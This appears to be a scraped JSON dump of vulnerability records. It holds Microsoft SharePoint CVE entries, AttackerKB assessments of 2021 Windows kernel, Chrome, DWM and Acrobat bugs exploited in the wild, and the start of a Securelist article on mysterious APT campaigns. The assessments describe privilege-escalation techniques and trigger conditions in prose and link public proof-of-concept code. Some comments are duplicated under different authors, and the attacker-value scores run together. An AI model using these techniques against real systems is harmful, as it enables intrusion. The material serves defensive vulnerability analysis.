Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31963", "CVE-2021-31966"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31963", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31963", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:10", "description": "Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26420, CVE-2021-31963.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft SharePoint Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31963", "CVE-2021-31966"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31966", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31966", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:12", "description": "Microsoft SharePoint Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31963, CVE-2021-31966.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft SharePoint Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31963", "CVE-2021-31966"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-26420", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26420", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-09-21T18:18:37", "description": "Microsoft 
Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31199.\n\n \n**Recent assessments:** \n \n**architect00** at June 09, 2021 6:55am UTC reported:\n\nThis vulnerability is abused in an exploitation chain. According to the Microsoft advisory it is abused with [Adobe Acrobat CVE-2021-28550](<https://attackerkb.com/topics/6EI6mBj0hQ/cve-2021-28550>).\n\n**gwillcox-r7** at June 17, 2021 4:19pm UTC reported:\n\nThis vulnerability is abused in an exploitation chain. According to the Microsoft advisory it is abused with [Adobe Acrobat CVE-2021-28550](<https://attackerkb.com/topics/6EI6mBj0hQ/cve-2021-28550>).\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31201", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-06-11T00:00:00", "id": "AKB:50EC30BE-5E8C-4158-8AA0-06397441F8A5", "href": 
"https://attackerkb.com/topics/DEo4rIL8JT/cve-2021-31201", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-09T11:15:19", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31201.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 4:20pm UTC reported:\n\nNot got much to contribute due to limited public information at this time but I did want to note that the `Confidentiality` and `Integrity` scores for this are oddly listed as `Low`, the `Availability` as `None`, and yet `Scope` is marked as `Changed`. My guess is that this is some sort of sandbox related escape given that if we were able to get higher permissions these scores would be a lot higher.\n\n**architect00** at June 09, 2021 6:57am UTC reported:\n\nNot got much to contribute due to limited public information at this time but I did want to note that the `Confidentiality` and `Integrity` scores for this are oddly listed as `Low`, the `Availability` as `None`, and yet `Scope` is marked as `Changed`. 
My guess is that this is some sort of sandbox related escape given that if we were able to get higher permissions these scores would be a lot higher.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31199", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-06-16T00:00:00", "id": "AKB:DBAEA288-D224-49E1-877D-628DFD1CF161", "href": "https://attackerkb.com/topics/GmE7G3wbbK/cve-2021-31199", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-24T20:16:01", "description": "Windows Kernel Information Disclosure Vulnerability \nThe type of information that could be disclosed if an attacker successfully exploited this vulnerability is the contents of Kernel memory. 
An attacker could read the contents of Kernel memory from a user mode process.\n\nThe team at Kaspersky have reported threat actors are exploiting this Microsoft Windows OS kernel vulnerability\n\nSource: <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 3:23pm UTC reported:\n\nAh good old `NtQuerySystemInformation()` strikes again, never quite going out of style :) In this case CVE-2021-31955 is an information disclosure in good old `ntoskrnl.exe`, aka the Windows kernel itself, that occurs due to a Windows feature supported since Windows Vista known as SuperFetch. By sending a `SystemSuperfetchInformation` class request of type `SuperfetchPrivSourceQuery` via the undocumented `NtQuerySystemInformation()` function, one can obtain the kernel address of the `EPROCESS` structure for the current process. This is REALLY bad since the `EPROCESS` kernel structure also contains a pointer to the process\u2019s permissions token. 
If we know the address of this token, then, provided one has an arbitrary kernel write vulnerability, they can easily overwrite this pointer to point to the permissions token for a higher privilege process, and if this process is running as SYSTEM, they will gain SYSTEM level code execution.\n\nAccording to <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>, this was used in the wild alongside CVE-2021-31956 to escape the Chrome sandbox and gain SYSTEM on affected users' computers, after first compromising Chrome and gaining execution inside the Chrome sandbox with what is suspected to be CVE-2021-21224.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31955", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-06-08T00:00:00", "id": "AKB:21C170FF-C7C6-4BFB-8AED-613970EDA44C", "href": "https://attackerkb.com/topics/NQpSb1TpCN/cve-2021-31955", "cvss": {"score": 
9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-25T11:15:03", "description": "Type confusion in V8 in Google Chrome prior to 90.0.4430.85 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 3:06pm UTC reported:\n\nAccording to <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/> this appears to have been used along with CVE-2021-31955 and CVE-2021-31956, a Windows kernel information leak and a Windows LPE vulnerability, to form a full RCE to go from a user browsing a web page to full SYSTEM control over a target Windows device. This is an extremely powerful and valuable exploit chain, and many exploit brokers are willing to pay large sums of money for these chains as they often are very valuable to nation states who wish to use them for their intelligence operations.\n\nOverall though, on its own it seems like this bug wasn\u2019t super valuable as you only get RCE within the sandbox itself, which is why it was then chained with a Windows kernel bug to escape the Chrome sandbox and gain RCE as SYSTEM on the target device. Therefore the risk for this vulnerability alone is lower, however if we keep in mind the other bugs that existed at the time, the overall risk is quite high.\n\nThere also appears to have been public exploit code available for this vulnerability, available at <https://github.com/avboy1337/1195777-chrome0day>, which was potentially reused by the attackers. In any case at the time that code was released the bug was still unpatched, which led researchers at Kaspersky to conclude that it's likely attackers used the code from <https://github.com/avboy1337/1195777-chrome0day> in their attack.\n\nOtherwise this is your typical V8 type confusion bug. V8 seems to have had quite a few type confusion bugs in the past so this is nothing too new. 
If you want to limit exposure, disable JavaScript in your browser on untrusted sites, which will help prevent users from being exploited by these types of attacks as most of them rely on JavaScript to set up the environment in Chrome appropriately. That being said, disabling JavaScript will break most sites so take this with a grain of salt :)\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-21224", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-04-28T00:00:00", "id": "AKB:160D34D9-2175-4B27-87F8-0CED51121F50", "href": "https://attackerkb.com/topics/fLcfbPxB38/cve-2021-21224", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-15T17:40:03", "description": "Microsoft DWM Core Library Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 5:19pm UTC reported:\n\nPublic PoC code has been 
supposedly making the rounds courtesy of <https://github.com/mavillon1/CVE-2021-33739-POC>. There is also a detailed writeup on this issue at <https://mp.weixin.qq.com/s/ZjJ4kXOCTSez2erVKYzKbg> although it is in Chinese so you will need to translate it.\n\nFrom the translation it seems this was originally discovered as being exploited in the wild by Shadow Lab in May 2021, and then they worked with Anheng Threat Intelligence Center to notify MSRC, who then patched the bug in the June 2021 patch release. The vulnerability is located in `dwmcore.dll`, which is the core DLL for DWM, aka the Desktop Window Manager, on Windows machines. More specifically, it\u2019s a UAF caused by a reference count tracking issue of the Tracker Binding Manager object. It\u2019s interesting also to note that they state this vulnerability only affects Windows 10 machines and does not affect Windows 8.1 and below; this is reflected in Microsoft\u2019s advisory as well.\n\nTo trigger the vulnerability, one needs to \u201ccreate a CinteractionTrackerBindingManagerMarshaler(0x59) resource and a CinteractionTrackerMarshaler(0x58) resource at the code level, and bind the same CinteractionTrackerMarshaler resource as resource1_id and resource2_id to the CinteractionTrackerBindingManagerMarshaler, and do not manually release the CinteractionTrackerBindingManagerMarshaler resource.\u201d. I won\u2019t discuss it further as the technical details are in the original writeup, but this should provide a brief overview for those interested.\n\nThe conclusion of this writeup notes that technically this vulnerability falls within the scope of the Windows DirectComposition component, which has seen increased attacks over the last two years. 
It also notes that this may have ties to the release of the `Win32k Dark: Attacking The Shadow Part of Graphic Subsystem` presentation at the CanSecWest 2017 conference, where researchers discussed how to attack Windows DirectComposition in more detail.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-33739", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33739"], "modified": "2021-06-15T00:00:00", "id": "AKB:86197DAF-4CA4-4CD7-B1A5-5F00DE015C96", "href": "https://attackerkb.com/topics/0U2q9CRKW5/cve-2021-33739", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-27T04:44:38", "description": "Acrobat Reader DC versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by a Use After Free vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 04, 2021 5:25pm UTC reported:\n\nNo real details on this at the moment but according to Adobe\u2019s website at <https://helpx.adobe.com/security/products/acrobat/apsb21-29.html> this is a Use-After-Free bug in Adobe Acrobat that leads to remote code execution when opening a PDF. It was anonymously reported and has been reported to be exploited in the wild in limited targeted attacks against Windows users.\n\nGiven the available information though I would guess that to trigger this vulnerability a user would have to open a PDF containing malicious code in Adobe Acrobat and then the malicious PDF would run some JavaScript or similar to put memory into a stable state such that it would be able to trigger the UAF and gain control of Adobe Acrobat without crashing it.\n\nGiven Adobe Acrobat is popular though the attacker value for this bug is pretty high, though I did deduct a point if only because an attacker would still need to convince a user to open the PDF. I also set the exploitability at medium as UAF bugs are not that easy to exploit, however web browsers and PDF readers often provide JavaScript engines that allow attackers to more easily control the state of memory, which can greatly ease the process of exploit development. 
However without knowing more info it\u2019s difficult to gauge the level of exploitation difficulty for this specific exploit.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-28550", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550"], "modified": "2021-09-16T00:00:00", "id": "AKB:132606CF-7B8C-4EE8-BE1C-308811E7B813", "href": "https://attackerkb.com/topics/6EI6mBj0hQ/cve-2021-28550", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-31T20:18:07", "description": "Windows NTFS Elevation of Privilege Vulnerability \nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nAdditionally, an attacker could convince a local user to open a malicious file. 
The attacker would have to convince the user to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.\n\nThe team at Kaspersky have reported threat actors are exploiting this Microsoft Windows OS kernel vulnerability.\n\nSource: <https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 4:04pm UTC reported:\n\nThis is a heap buffer overflow in `ntfs.sys`, one of the Windows kernel drivers, which was patched in June 2021. Heap vulnerabilities in the kernel are notoriously unreliable and hard to exploit, particularly given recent mitigations in Windows 8 and then later in Windows 10 that have introduced additional randomness to the kernel heap as well as additional state checks that will result in Windows terminating immediately if data does not look to be valid. Therefore realize that whilst this exploit has been exploited in the wild, I would imagine the reliability may be questionable or there may have been considerable work done behind the scenes to make the exploit more reliable.\n\nIn any case, the affected function is `NtfsQueryEaUserEaList()` in `ntfs.sys` which processes a list of extended attributes (this is where the `ea` part of the function name comes from) for a file and saves the retrieved values to a buffer. The problem here though is that users can make a Windows system call to access this function and `NtfsQueryEaUserEaList()` and it\u2019s possible to control the size of the output buffer. However the output buffer\u2019s size has to be 32-bit aligned. 
This causes an issue as whilst the code does check to make sure the output buffer can hold the content of the extended attribute list with padding, it doesn\u2019t check for integer underflows, meaning that the check is done as though the number was an unsigned integer, yet when copying memory it\u2019s treated as a signed integer, which can result in the number underflowing and becoming a large positive number, such that a lot of memory is copied into a very small buffer.\n\nThis is a particularly interesting case as most of the time when one combines an integer underflow/overflow with a heap buffer vulnerability, things don\u2019t tend to pan out so well due to the user corrupting too much memory to reliably control the heap. This can cause issues later on when Windows checks the heap state and suddenly finds everything is trashed, resulting in a BSOD if one corrupts kernel heap memory. For this reason, I\u2019m interested to see how the attackers actually managed to accurately control heap memory in this scenario to exploit the vulnerability.\n\nFrom the advisory we are given some hints that the Windows Notification Facility (WNF) was used along with this vulnerability to get arbitrary memory read and write primitives, which is a new kernel exploitation strategy I have not heard about before. It appears this was also new to Kaspersky as well as they mention they will be publishing more information about this technique in the future.\n\nAdditionally, showcasing the sophistication of the attackers who exploited this vulnerability, they also used a rarely used `PreviousMode` overwrite instead of overwriting the `Token` field of the `EPROCESS` structure to steal the token. As mentioned at <https://github.com/oct0xor/presentations/blob/master/2019-02-Overview%20of%20the%20latest%20Windows%20OS%20kernel%20exploits%20found%20in%20the%20wild.pdf>, this field controls which mode the kernel was in prior to performing a system call. 
This can allow an attacker to perform sensitive actions by essentially tricking the OS into thinking a system call was made from kernel mode when in reality it was not.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31956", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-06-08T00:00:00", "id": "AKB:03F5DDB7-DFAF-4815-9563-05762A387A0A", "href": "https://attackerkb.com/topics/Xixbnqn9qC/cve-2021-31956", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-10T15:12:49", "description": "Windows MSHTML Platform Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**NinjaOperator** at June 16, 2021 10:56pm UTC reported:\n\nWindows MSHTML Platform (Microsoft proprietary browser engine) enables RCE and is being actively exploited in limited campaigns. 
\n\uf0a7 Exploitation requires user interaction; thus, feasible threat scenarios include drive-by download, exploit kits, and phishing links. \n\uf0a7 A commercial exploit company reportedly provided the exploit code to Eastern European and Middle Eastern state-sponsored actors\n\n**gwillcox-r7** at June 17, 2021 5:25pm UTC reported:\n\nWindows MSHTML Platform (Microsoft proprietary browser engine) enables RCE and is being actively exploited in limited campaigns. \n\uf0a7 Exploitation requires user interaction; thus, feasible threat scenarios include drive-by download, exploit kits, and phishing links. \n\uf0a7 A commercial exploit company reportedly provided the exploit code to Eastern European and Middle Eastern state-sponsored actors\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-33742", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33742"], "modified": "2021-06-15T00:00:00", "id": "AKB:19A3B42A-68BD-48E1-847B-9BA88408EF2B", "href": 
"https://attackerkb.com/topics/oLB20MCHnO/cve-2021-33742", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2022-10-10T08:05:03", "description": "\n\nTargeted attack attribution is always a tricky thing, and in general, we believe that attribution is best left to law enforcement agencies. The reason is that, while in 90% of cases it is possible to understand a few things about the attackers, such as their native language or even location, the remaining 10% can lead to embarrassing attribution errors or worse. High-profile actors make every effort to stay undetected inside the victim's infrastructure and to leave as few traces as they can. They implement a variety of techniques to make investigation of their campaigns more difficult. Using LOLBINS, common legitimate pentesting tools, and fileless malware; misleading security researchers by placing false flags\u2014these and other anti-forensic tricks often make threat attribution a matter of luck. That is why there is always a percentage of targeted attacks that remain unattributed for years. Recently, I shared [my TOP 10 list of the most mysterious APT](<https://twitter.com/craiu/status/1573272440704319488>) campaigns/tools on Twitter. In this article, I provide a bit more detail on each case.\n\n## 1\\. Project TajMahal\n\nIn late 2018, we discovered a sophisticated espionage framework, which we dubbed "[TajMahal](<https://securelist.com/project-tajmahal/90240/>)". It consists of two different packages, self-named "Tokyo" and "Yokohama", and is capable of stealing a variety of data, including data from CDs burnt on the victim's machine and documents sent to the printer queue. Each package includes a number of malicious tools: backdoors, keyloggers, downloaders, orchestrators, screen and webcam grabbers, audio recorders, and more. 
In total, up to 80 malicious modules were discovered.\n\nProject TajMahal had been active for at least five years before we first detected it. What makes it even more mysterious is that its only known victim is a high-profile diplomatic entity. Who was behind the attack, if there were any other victims, or whether the whole toolset was developed to penetrate just one organization\u2014these questions remain unanswered.\n\n## 2\\. DarkUniverse\n\nDarkUniverse is [another APT framework](<https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/>) we discovered and reported on in 2018. It was active in the wild for at least eight years\u2014from 2009 to 2017\u2014and targeted at least 20 civilian and military entities in Syria, Iran, Afghanistan, Tanzania, Ethiopia, Sudan, Russia, Belarus, and the United Arab Emirates. The malware spreads through spear-phishing emails with a malicious Microsoft Office document as an attachment. It consists of several modules responsible for different espionage activities such as keylogging, mail traffic interception, making screenshots, collecting a wide variety of system information, and more.\n\nThe only prominent case of DarkUniverse being spotted in the wild was when their [sophisticated ItaDuke 